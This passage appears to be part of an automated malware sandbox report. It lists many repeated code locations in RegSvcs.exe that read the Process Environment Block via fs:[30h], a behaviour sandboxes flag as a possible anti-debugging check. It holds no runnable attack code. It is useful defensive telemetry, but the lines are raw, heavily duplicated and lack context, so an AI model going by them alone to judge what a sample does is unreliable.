          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h]8_2_00FAE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h]8_2_00FAE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h]8_2_00FAE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h]8_2_00FAE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h]8_2_00FAE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE443 mov eax, dword ptr fs:[00000030h]8_2_00FAE443
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6C427 mov eax, dword ptr fs:[00000030h]8_2_00F6C427
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6E420 mov eax, dword ptr fs:[00000030h]8_2_00F6E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6E420 mov eax, dword ptr fs:[00000030h]8_2_00F6E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6E420 mov eax, dword ptr fs:[00000030h]8_2_00F6E420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h]8_2_00FF6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h]8_2_00FF6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h]8_2_00FF6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h]8_2_00FF6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h]8_2_00FF6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h]8_2_00FF6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF6420 mov eax, dword ptr fs:[00000030h]8_2_00FF6420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA8402 mov eax, dword ptr fs:[00000030h]8_2_00FA8402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA8402 mov eax, dword ptr fs:[00000030h]8_2_00FA8402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA8402 mov eax, dword ptr fs:[00000030h]8_2_00FA8402
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F725E0 mov eax, dword ptr fs:[00000030h]8_2_00F725E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAC5ED mov eax, dword ptr fs:[00000030h]8_2_00FAC5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAC5ED mov eax, dword ptr fs:[00000030h]8_2_00FAC5ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]8_2_00F9E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]8_2_00F9E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]8_2_00F9E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]8_2_00F9E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]8_2_00F9E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]8_2_00F9E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]8_2_00F9E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9E5E7 mov eax, dword ptr fs:[00000030h]8_2_00F9E5E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F765D0 mov eax, dword ptr fs:[00000030h]8_2_00F765D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAA5D0 mov eax, dword ptr fs:[00000030h]8_2_00FAA5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAA5D0 mov eax, dword ptr fs:[00000030h]8_2_00FAA5D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE5CF mov eax, dword ptr fs:[00000030h]8_2_00FAE5CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE5CF mov eax, dword ptr fs:[00000030h]8_2_00FAE5CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F945B1 mov eax, dword ptr fs:[00000030h]8_2_00F945B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F945B1 mov eax, dword ptr fs:[00000030h]8_2_00F945B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0102A456 mov eax, dword ptr fs:[00000030h]8_2_0102A456
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF05A7 mov eax, dword ptr fs:[00000030h]8_2_00FF05A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF05A7 mov eax, dword ptr fs:[00000030h]8_2_00FF05A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF05A7 mov eax, dword ptr fs:[00000030h]8_2_00FF05A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAE59C mov eax, dword ptr fs:[00000030h]8_2_00FAE59C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA4588 mov eax, dword ptr fs:[00000030h]8_2_00FA4588
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F72582 mov eax, dword ptr fs:[00000030h]8_2_00F72582
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F72582 mov ecx, dword ptr fs:[00000030h]8_2_00F72582
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6A580 mov ecx, dword ptr fs:[00000030h]8_2_00F6A580
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6A580 mov eax, dword ptr fs:[00000030h]8_2_00F6A580
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA656A mov eax, dword ptr fs:[00000030h]8_2_00FA656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA656A mov eax, dword ptr fs:[00000030h]8_2_00FA656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA656A mov eax, dword ptr fs:[00000030h]8_2_00FA656A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0102A49A mov eax, dword ptr fs:[00000030h]8_2_0102A49A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F78550 mov eax, dword ptr fs:[00000030h]8_2_00F78550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F78550 mov eax, dword ptr fs:[00000030h]8_2_00F78550
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9E53E mov eax, dword ptr fs:[00000030h]8_2_00F9E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9E53E mov eax, dword ptr fs:[00000030h]8_2_00F9E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9E53E mov eax, dword ptr fs:[00000030h]8_2_00F9E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9E53E mov eax, dword ptr fs:[00000030h]8_2_00F9E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9E53E mov eax, dword ptr fs:[00000030h]8_2_00F9E53E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80535 mov eax, dword ptr fs:[00000030h]8_2_00F80535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80535 mov eax, dword ptr fs:[00000030h]8_2_00F80535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80535 mov eax, dword ptr fs:[00000030h]8_2_00F80535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80535 mov eax, dword ptr fs:[00000030h]8_2_00F80535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80535 mov eax, dword ptr fs:[00000030h]8_2_00F80535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80535 mov eax, dword ptr fs:[00000030h]8_2_00F80535
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FEE6F2 mov eax, dword ptr fs:[00000030h]8_2_00FEE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FEE6F2 mov eax, dword ptr fs:[00000030h]8_2_00FEE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FEE6F2 mov eax, dword ptr fs:[00000030h]8_2_00FEE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FEE6F2 mov eax, dword ptr fs:[00000030h]8_2_00FEE6F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF06F1 mov eax, dword ptr fs:[00000030h]8_2_00FF06F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF06F1 mov eax, dword ptr fs:[00000030h]8_2_00FF06F1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAA6C7 mov ebx, dword ptr fs:[00000030h]8_2_00FAA6C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAA6C7 mov eax, dword ptr fs:[00000030h]8_2_00FAA6C7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA66B0 mov eax, dword ptr fs:[00000030h]8_2_00FA66B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAC6A6 mov eax, dword ptr fs:[00000030h]8_2_00FAC6A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F74690 mov eax, dword ptr fs:[00000030h]8_2_00F74690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F74690 mov eax, dword ptr fs:[00000030h]8_2_00F74690
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA2674 mov eax, dword ptr fs:[00000030h]8_2_00FA2674
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101678E mov eax, dword ptr fs:[00000030h]8_2_0101678E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAA660 mov eax, dword ptr fs:[00000030h]8_2_00FAA660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAA660 mov eax, dword ptr fs:[00000030h]8_2_00FAA660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010247A0 mov eax, dword ptr fs:[00000030h]8_2_010247A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8C640 mov eax, dword ptr fs:[00000030h]8_2_00F8C640
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA6620 mov eax, dword ptr fs:[00000030h]8_2_00FA6620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA8620 mov eax, dword ptr fs:[00000030h]8_2_00FA8620
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7262C mov eax, dword ptr fs:[00000030h]8_2_00F7262C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E627 mov eax, dword ptr fs:[00000030h]8_2_00F8E627
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2619 mov eax, dword ptr fs:[00000030h]8_2_00FB2619
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h]8_2_00F8260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h]8_2_00F8260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h]8_2_00F8260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h]8_2_00F8260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h]8_2_00F8260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h]8_2_00F8260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8260B mov eax, dword ptr fs:[00000030h]8_2_00F8260B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FEE609 mov eax, dword ptr fs:[00000030h]8_2_00FEE609
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F747FB mov eax, dword ptr fs:[00000030h]8_2_00F747FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F747FB mov eax, dword ptr fs:[00000030h]8_2_00F747FB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F927ED mov eax, dword ptr fs:[00000030h]8_2_00F927ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F927ED mov eax, dword ptr fs:[00000030h]8_2_00F927ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F927ED mov eax, dword ptr fs:[00000030h]8_2_00F927ED
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FFE7E1 mov eax, dword ptr fs:[00000030h]8_2_00FFE7E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7C7C0 mov eax, dword ptr fs:[00000030h]8_2_00F7C7C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF07C3 mov eax, dword ptr fs:[00000030h]8_2_00FF07C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F707AF mov eax, dword ptr fs:[00000030h]8_2_00F707AF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103866E mov eax, dword ptr fs:[00000030h]8_2_0103866E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103866E mov eax, dword ptr fs:[00000030h]8_2_0103866E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F78770 mov eax, dword ptr fs:[00000030h]8_2_00F78770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]8_2_00F80770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]8_2_00F80770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]8_2_00F80770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]8_2_00F80770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]8_2_00F80770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]8_2_00F80770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]8_2_00F80770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]8_2_00F80770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]8_2_00F80770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]8_2_00F80770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]8_2_00F80770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F80770 mov eax, dword ptr fs:[00000030h]8_2_00F80770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FFE75D mov eax, dword ptr fs:[00000030h]8_2_00FFE75D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F70750 mov eax, dword ptr fs:[00000030h]8_2_00F70750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF4755 mov eax, dword ptr fs:[00000030h]8_2_00FF4755
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2750 mov eax, dword ptr fs:[00000030h]8_2_00FB2750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2750 mov eax, dword ptr fs:[00000030h]8_2_00FB2750
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6A740 mov eax, dword ptr fs:[00000030h]8_2_00F6A740
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA674D mov esi, dword ptr fs:[00000030h]8_2_00FA674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA674D mov eax, dword ptr fs:[00000030h]8_2_00FA674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA674D mov eax, dword ptr fs:[00000030h]8_2_00FA674D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA273C mov eax, dword ptr fs:[00000030h]8_2_00FA273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA273C mov ecx, dword ptr fs:[00000030h]8_2_00FA273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA273C mov eax, dword ptr fs:[00000030h]8_2_00FA273C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FEC730 mov eax, dword ptr fs:[00000030h]8_2_00FEC730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAC720 mov eax, dword ptr fs:[00000030h]8_2_00FAC720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAC720 mov eax, dword ptr fs:[00000030h]8_2_00FAC720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F70710 mov eax, dword ptr fs:[00000030h]8_2_00F70710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0710 mov eax, dword ptr fs:[00000030h]8_2_00FA0710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAC700 mov eax, dword ptr fs:[00000030h]8_2_00FAC700
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAC8F9 mov eax, dword ptr fs:[00000030h]8_2_00FAC8F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAC8F9 mov eax, dword ptr fs:[00000030h]8_2_00FAC8F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0100892B mov eax, dword ptr fs:[00000030h]8_2_0100892B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9E8C0 mov eax, dword ptr fs:[00000030h]8_2_00F9E8C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01044940 mov eax, dword ptr fs:[00000030h]8_2_01044940
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FFC89D mov eax, dword ptr fs:[00000030h]8_2_00FFC89D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F70887 mov eax, dword ptr fs:[00000030h]8_2_00F70887
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01014978 mov eax, dword ptr fs:[00000030h]8_2_01014978
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01014978 mov eax, dword ptr fs:[00000030h]8_2_01014978
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FFE872 mov eax, dword ptr fs:[00000030h]8_2_00FFE872
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FFE872 mov eax, dword ptr fs:[00000030h]8_2_00FFE872
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F74859 mov eax, dword ptr fs:[00000030h]8_2_00F74859
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F74859 mov eax, dword ptr fs:[00000030h]8_2_00F74859
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA0854 mov eax, dword ptr fs:[00000030h]8_2_00FA0854
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F82840 mov ecx, dword ptr fs:[00000030h]8_2_00F82840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010069C0 mov eax, dword ptr fs:[00000030h]8_2_010069C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FAA830 mov eax, dword ptr fs:[00000030h]8_2_00FAA830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F92835 mov eax, dword ptr fs:[00000030h]8_2_00F92835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F92835 mov eax, dword ptr fs:[00000030h]8_2_00F92835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F92835 mov eax, dword ptr fs:[00000030h]8_2_00F92835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F92835 mov ecx, dword ptr fs:[00000030h]8_2_00F92835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F92835 mov eax, dword ptr fs:[00000030h]8_2_00F92835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F92835 mov eax, dword ptr fs:[00000030h]8_2_00F92835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0103A9D3 mov eax, dword ptr fs:[00000030h]8_2_0103A9D3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FFC810 mov eax, dword ptr fs:[00000030h]8_2_00FFC810
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA29F9 mov eax, dword ptr fs:[00000030h]8_2_00FA29F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA29F9 mov eax, dword ptr fs:[00000030h]8_2_00FA29F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FFE9E0 mov eax, dword ptr fs:[00000030h]8_2_00FFE9E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A9D0 mov eax, dword ptr fs:[00000030h]8_2_00F7A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A9D0 mov eax, dword ptr fs:[00000030h]8_2_00F7A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A9D0 mov eax, dword ptr fs:[00000030h]8_2_00F7A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A9D0 mov eax, dword ptr fs:[00000030h]8_2_00F7A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A9D0 mov eax, dword ptr fs:[00000030h]8_2_00F7A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7A9D0 mov eax, dword ptr fs:[00000030h]8_2_00F7A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FA49D0 mov eax, dword ptr fs:[00000030h]8_2_00FA49D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101483A mov eax, dword ptr fs:[00000030h]8_2_0101483A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101483A mov eax, dword ptr fs:[00000030h]8_2_0101483A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF89B3 mov esi, dword ptr fs:[00000030h]8_2_00FF89B3
